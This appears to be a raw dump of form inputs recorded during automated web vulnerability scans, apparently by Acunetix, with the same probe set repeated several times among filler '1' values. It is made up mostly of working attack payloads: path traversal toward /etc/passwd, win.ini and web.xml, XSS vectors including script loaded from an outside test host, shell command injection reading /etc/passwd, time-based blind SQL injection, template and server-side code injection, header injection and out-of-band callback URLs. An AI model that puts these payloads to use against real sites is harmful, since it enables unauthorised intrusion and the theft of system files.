acux8106\xc0\xbez1\xc0\xbcz2a\x90bcxuca8106

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(933713)</ScRiPt>

1

1

1

1

1<script>prompt(950697)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(923075)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915497></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(993963)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(904564)">

1

response.write(9597859*9602880)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(920494)"></g></svg>

1

1

1<div style=width:expression(prompt(945369))>

WEB-INF/web.xml

'+response.write(9597859*9602880)+'

1

&cat /etc/passwd&

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9597859*9602880)+"

WEB-INF\web.xml

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(957278)>

../../../../../../../../../../etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970730)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(962565)>

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(960388)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99857+100052}

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(978334)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

1

)

1&n968235=v901667

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

-1))

\xf6<img acu onmouseover=prompt(907932) //\xf6>

'"()

1

1

testasp.vulnweb.com

!(()&&!|*|*|

1

1

7Vf4Bou5'

1<input autofocus onfocus=prompt(944772)>

"|"ld

/etc/passwd

1

^(#$!@#$)(()))******

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

ZdWNKhUV')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

1

xh6733QZ'))

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

"

1

1

-1

"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_7GnLH <ScRiPt >prompt(972451)</ScRiPt>

1

1

1

||cat /etc/passwd

-1)

1

${@print(md5(acunetix_wvs_security_test))}

http://hit9uzoVHweZA.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

-1))

&dir

1

file:///etc/passwd

1

1

1

1

http://www.acunetix.tst

'"

'&dir&'

xBdCxUeF'

comments

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(908735)</ScRiPt>

1

1

<!--

comments

cXmItavf')

"&dir&"

WEB-INF/web.xml

1

1

'"()&%<ScRiPt >prompt(967067)</ScRiPt>

1

1

comments/.

WEB-INF\web.xml

|dir

u5LjmPuA'))

1

1

1

1_925004

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

acu5442\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5442

1

../../../../../../../../../../windows/win.ini.jpg

1

acux8004\xc0\xbez1\xc0\xbcz2a\x90bcxuca8004

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(936849)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(929099)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(952099)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934198></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(989876)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(958014)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934898)"></g></svg>

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(965724))>

1

response.write(9449108*9688911)

WEB-INF\web.xml

1

1

1

'+response.write(9449108*9688911)+'

1<iframe src='data:text/html

1

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9449108*9688911)+"

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(998247)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936734)>

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1<img src=xyz OnErRor=prompt(940799)>

1

if(now()=sysdate(),sleep(6.374),0)/*'XOR(if(now()=sysdate(),sleep(6.374),0))OR'"XOR(if(now()=sysdate(),sleep(6.374),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

1<img/src=">" onerror=alert(900000)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99998+99604}

if(now()=sysdate(),sleep(3.187),0)/*'XOR(if(now()=sysdate(),sleep(3.187),0))OR'"XOR(if(now()=sysdate(),sleep(3.187),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

1

${99998+99604}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(900000)>

1

if(now()=sysdate(),sleep(9.561),0)/*'XOR(if(now()=sysdate(),sleep(9.561),0))OR'"XOR(if(now()=sysdate(),sleep(9.561),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

cat /etc/passwd

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

${99998+99604}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(900000)>

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(969636)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

(select(0)from(select(sleep(9.561)))v)/*'+(select(0)from(select(sleep(9.561)))v)+'"+(select(0)from(select(sleep(9.561)))v)+"*/

1

1&n986718=v948154

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

|cat /etc/passwd#

1

-1

1

\xf6<img acu onmouseover=prompt(938272) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(968465)>

-1)

1

'|'ld

1

^(#$!@#$)(()))******

/etc/passwd

'"()

1

"|"ld

1

-1))

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

'

[url=http://www.acunetix.com]website security[/url]

GzQZQeu5'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

'

1

1

1_HaQ3X <ScRiPt >prompt(914132)</ScRiPt>

tA8OnLLp')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

UkwTMpnb'))

1

1

1

"

http://hitUf9MZY4kAe.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

1

comments

1

-1)

http://www.acunetix.tst

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

&dir

comments

1

-1))

1

'"

1

1'"()&%<ScRiPt >prompt(937949)</ScRiPt>

1

IhNHicDA'

'&dir&'

comments/.

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(908038)</ScRiPt>

<!--

1

hWYZ9Co7')

1

"&dir&"

1

WEB-INF\web.xml

WvLhDfwu'))

1

1_941874

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

'|dir

1

../../../../../../../../../../boot.ini

1

"|dir

1

acu3372\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3372

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux4481\xc0\xbez1\xc0\xbcz2a\x90bcxuca4481

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(931213)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(914641)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(955648)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938083></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(925550)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(969565)">

response.write(9484845*9527605)

1

1

1

1

'+response.write(9484845*9527605)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983721)"></g></svg>

1

&cat /etc/passwd&

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9484845*9527605)+"

1

1<div style=width:expression(prompt(987401))>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1<body onload=prompt(937229)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906592)>

1

1

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

-1)

1

1<img src=xyz OnErRor=prompt(938985)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99028+99675}

1<img/src=">" onerror=alert(980849)>

-1))

1

|cat /etc/passwd#

1

1&n926939=v993990

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(943611)</sCripT>

'|'ld

1

)

WHKjMFHH'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

BOIYzRrG')

!(()&&!|*|*|

'"()

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(911494) //\xf6>

/etc/passwd

1

'

xAO74vC5'))

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(906146)>

1

1

1

'

-1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

"

1

1

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1_UiiTx <ScRiPt >prompt(938990)</ScRiPt>

1

Vg15Q23y'

http://hitBy5WXLQg5H.bxss.me/

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

6jLkbtMv')

1

1

comments

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

NhiCLIPQ'))

1

http://www.acunetix.tst

1

file:///etc/passwd

"&dir&"

comments

1

1

1

1

'"

comments/.

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(975656)</ScRiPt>

<!--

1

1

1

1

'"()&%<ScRiPt >prompt(924615)</ScRiPt>

WEB-INF/web.xml

'|dir

1

1

1

1_958865

WEB-INF\web.xml

1

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu10328\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10328

../../../../../../../../../../boot.ini

1

1

1

1

acux7038\xc0\xbez1\xc0\xbcz2a\x90bcxuca7038

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(921712)</ScRiPt>

1

1

1

1<script>prompt(919231)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(998320)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?960984></ScRiPt>

1

1

1

1<ScRiPt >prompt(919772)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(996629)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

response.write(9333500*9382418)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912413)"></g></svg>

1

WEB-INF/web.xml

'+response.write(9333500*9382418)+'

1

&cat /etc/passwd&

1

WEB-INF\web.xml

"+response.write(9333500*9382418)+"

1<div style=width:expression(prompt(985495))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(966463)>

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959429)>

1

`cat /etc/passwd`

-1

1

${99063+100393}

1<img src=xyz OnErRor=prompt(932683)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(999458)>

1

1&n953123=v981536

|cat /etc/passwd#

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(938708)</sCripT>

)

1

-1))

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1&lt

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

g7n3O5b8'

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

1

\xf6<img acu onmouseover=prompt(944030) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

XaZOX9fv')

/etc/passwd

1

'

1<input autofocus onfocus=prompt(916185)>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'

fsaYKApH'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

-1

http://hitKZmvJaifzN.bxss.me/

acunetix_wvs_invalid_filename

1_QgfFS <ScRiPt >prompt(932639)</ScRiPt>

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

&dir

1

-1))

http://www.acunetix.tst

1

file:///etc/passwd

comments

1

1

'&dir&'

TbkBZ7Vz'

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

XXK9BbrG')

<!--

1'"()&%<ScRiPt >prompt(909834)</ScRiPt>

"&dir&"

1

WEB-INF/web.xml

1

1

qIdJ7jrf'))

|dir

1

'"()&%<ScRiPt >prompt(992752)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1_943049

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu8891\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8891

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux3603\xc0\xbez1\xc0\xbcz2a\x90bcxuca3603

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(964668)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(953911)</script>

1

1

1

1<ScRiPt >prompt(943802)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981766></ScRiPt>

1

1

1

1<ScRiPt >prompt(927302)</ScRiPt>

response.write(9487171*9886101)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

'+response.write(9487171*9886101)+'

1<video><source onerror="javascript:prompt(981763)">

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907979)"></g></svg>

../../../../../../../../../../etc/passwd

"+response.write(9487171*9886101)+"

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<div style=width:expression(prompt(959490))>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<iframe src='data:text/html

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

1

`cat /etc/passwd`

1

1<body onload=prompt(957204)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99985+99806}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980999)>

1

|cat /etc/passwd#

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1&n999634=v900506

1

'|'ld

1

1<img src=xyz OnErRor=prompt(960343)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1)

1some_inexistent_file_with_long_name%00.jpg

)

1

-1))

1

"|"ld

1

1<img/src=">" onerror=alert(993587)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'"()

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Rs3qAxqA'

/etc/passwd

1<ScRiPt%20>prompt(994541)</sCripT>

1

1

6dkiG9kR')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

QoEZZW35'))

1

1&lt

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

-1

1

\xf6<img acu onmouseover=prompt(985899) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<input autofocus onfocus=prompt(928927)>

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

1

-1))

1

http://hitw2nIuguWFB.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

&dir

comments

file:///etc/passwd

1

1

1_tJQGn <ScRiPt >prompt(981614)</ScRiPt>

1

1

ANhayw2G'

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

http://www.acunetix.tst

1

comments/.

1

1

eZupge5t')

1

1

WEB-INF/web.xml

1

"&dir&"

'"

1

Z9SSDCqr'))

1'"()&%<ScRiPt >prompt(972404)</ScRiPt>

1

1

1

1

|dir

<!--

WEB-INF\web.xml

1

1

1

'"()&%<ScRiPt >prompt(918087)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1_919442

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu8923\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8923

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acux4385\xc0\xbez1\xc0\xbcz2a\x90bcxuca4385

1

1

1

1

1<ScRiPt >prompt(986406)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(979685)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(925895)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987631></ScRiPt>

1

1

1<ScRiPt >prompt(985948)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(925750)">

response.write(9422753*9999206)

1

1

'+response.write(9422753*9999206)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985944)"></g></svg>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"+response.write(9422753*9999206)+"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(913350))>

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(960164)>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991141)>

-1

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99280+99987}

-1)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(911036)>

1

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<img/src=">" onerror=alert(970068)>

1&n998899=v969406

1

1some_inexistent_file_with_long_name%00.jpg

1

GqLwPyqQ'

"|"ld

)

1

1<ScRiPt%20>prompt(929892)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

SZ0W1k8K')

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Tkmt0sTu'))

'"()

1&lt

'

^(#$!@#$)(()))******

-1

testasp.vulnweb.com

1

1

1

/etc/passwd

'

"

1

\xf6<img acu onmouseover=prompt(921705) //\xf6>

-1)

1

1

1

1

"

-1))

1<input autofocus onfocus=prompt(982428)>

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

